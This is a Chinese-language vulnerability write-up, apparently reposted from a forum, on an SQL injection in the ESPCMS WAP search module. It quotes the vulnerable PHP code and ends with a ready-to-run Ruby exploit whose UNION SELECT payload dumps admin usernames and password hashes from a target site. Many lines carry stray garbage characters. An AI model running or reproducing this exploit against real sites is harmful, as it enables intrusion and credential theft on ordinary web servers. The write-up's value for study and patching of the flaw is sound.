espcms wap模块搜索处SQL注入

admin

0×0 漏洞概述0×1 漏洞细节
' u" N7 P; J; K9 G8 X0×2 PoC
6 a/ I% b, O5 z) n
( z  P6 x' q3 h# e. I4 v( I
* D; w2 U8 E3 D% D
0×0 漏洞概述
3 f6 m0 T: _' ~+ d0 B; g
0 w9 g" K, x2 P+ t& r1 `* z易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统，它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便，可以帮您迅速、轻松地构建起一个强大专业的企业网站。
2 @! E9 O0 {7 G9 |. W( i9 F, ?$ z其在处理传入的参数时考虑不严谨导致SQL注入发生

* l0 o* O1 r4 ?" b1 _3 H7 r
0×1 漏洞细节
' m/ o* Y+ o0 M+ ]$ E2 s. K- h: z+ L
; v9 D( \5 ?& V/ {% ]( ~变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query，整个过程无过滤导致了注入的发生。
正因为变量是从$_SERVER['QUERY_STRING']中去取的，所以正好避开了程序的过滤。
而注入的变量是数组的值，并非数组的key，所以也没过被过滤，综合起来形成了一个比较少见的SQL注入。
% i5 z$ Y, E9 t* W
在/interface/3gwap_search.php文件的in_result函数中:



       function in_result() {
            ... ... ... ... ... ... ... ... ...
/ p% ]# @( Z) n3 X) A            $urlcode = $_SERVER[ 'QUERY_STRING '];
            parse_str(html_entity_decode($urlcode), $output);
& h0 t* q5 W$ {7 N
. s) }5 @1 t5 r6 }1 b; a            ... ... ... ... ... ... ... ... ...
* z* K9 H  s( t1 A; Y/ H1 J7 M            if (is_array($output['attr' ]) && count($output['attr']) > 0) {
' A( G8 k" Q/ h4 n1 h8 U
                  $db_table = db_prefix . 'model_att';
8 q7 D* l4 g3 A1 e( F: h; e" j/ a* ^
                   foreach ($output['attr' ] as $key => $value) {
$ G4 L8 ~3 A+ d  C                         if ($value) {

0 G2 g# ]  V# o4 F0 f: @) ?9 ]                              $key = addslashes($key);
                              $key = $this-> fun->inputcodetrim($key);
1 o& b8 w4 Y% I2 n0 y1 w% r                              $db_att_where = " WHERE isclass=1 AND attrname='$key'";
8 r  D& p! y+ C# o. x7 b7 U1 o                              $countnum = $this->db_numrows($db_table, $db_att_where);
5 c) v% M) ^+ `( }4 Y6 ]8 `, ]- \                               if ($countnum > 0) {
* t9 O4 e" p; f) C- s                                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
                              }
                        }
                  }
            }
5 b6 G( e/ N/ |  s            if (!empty ($keyword) && empty($keyname)) {
3 Q6 B7 [5 I+ V5 S) A, n                  $keyname = 'title';
                  $db_where.= " AND a.title like '%$keyword%'" ;
, ]8 H* N; m1 O0 Z9 k            } elseif (!empty ($keyword) && !empty($keyname)) {
                  $db_where.= " AND $keyname like '% $keyword%'";
9 X6 |+ K! ~% ^            }
            $pagemax = 15;

            $pagesylte = 1;
+ _0 L) ?7 b1 Z2 p% X& G5 x- x
             if ($countnum > 0) {
0 x/ Z* g; ^6 {
                  $numpage = ceil($countnum / $pagemax);
. P" S# Q; U, h5 Q            } else {
                  $numpage = 1;
4 w2 y3 ?0 [7 \' \0 {0 d- w            }
            $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
- F2 \% j: z0 z! }            $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' );            $rs = $this->db->query($sql);
# {# E; s9 I" D: I; o; w            ... ... ... ... ... ... ... ... ...
      }
- v; t2 V# q4 f* a: y6 w/ d

/ k6 A2 A& |* L0×2 PoC
* |. e+ H  x4 h. H0 v9 ]
0 m" q# a4 s6 k( Q9 P

require "net/http"
4 ?) B9 w" C0 d! N& I2 W
/ h2 m$ D! K% [  X, n& [def request(method, url)
( E( _/ l: P+ A$ }, C. ^  @( s* G    if method.eql?("get")
& F- I9 z5 ]# ]) ?2 ]" m        uri = URI.parse(url)
        http = Net::HTTP.new(uri.host, uri.port)
* s5 L0 E  }: ~3 V; g( v2 W* n        response = http.request(Net::HTTP::Get.new(uri.request_uri))
" g0 @1 U, s: {" b* f+ H        return response
. p5 L0 N+ s/ S) P/ p' J    end
2 X& X  k6 W# s. \, }  [end
8 ]/ T  p4 A/ _! j5 J6 A
5 @+ S5 ^8 c+ {. {# p0 J! g, Gdoc =<<HERE
$ C; P* F8 b6 ]2 J1 a* n' `) D& X-------------------------------------------------------
. k2 F5 x; ?2 O2 z* w1 b0 DEspcms Injection Exploit
( N6 o9 t  h0 `1 j! j! ~9 b4 |Author:ztz
Blog:http://ztz.fuzzexp.org/
  a. K; t$ F5 W-------------------------------------------------------

9 s" b6 S) v/ K& }HERE
! A* a7 r" I3 x2 z
usage =<<HERE
; u* g+ d+ T# @; L' L! e" dUsage:         ruby #{$0} host port path
+ `: u, f. Z+ D. ]' Z+ |6 g! qexample:     ruby #{$0} www.target.com 80 /
4 E8 B9 E- I1 s  LHERE

puts doc
if ARGV.length < 3
$ R0 X. Y# {3 e5 f2 B    puts usage
. C" m% I. \: ^" b% ]8 Nelse
% u8 S) A4 z5 h    $host = ARGV[0]
    $port = ARGV[1]
( `" G: C4 J6 j' t. m    $path = ARGV[2]

    puts "

send request..."
9 h8 g0 P9 E# r# m* }    url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
) G7 F' p9 b, J& |2 s3 b# M) E,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
; `4 g% N9 K1 n7 }% C- M    response = request("get", url)
    result = response.body.scan(/\w+&\w{32}/)
    puts result
5 D0 V1 l* j! M' Q( G  n7 Lend
( X: i7 R% p+ c' W& w; Y% R' R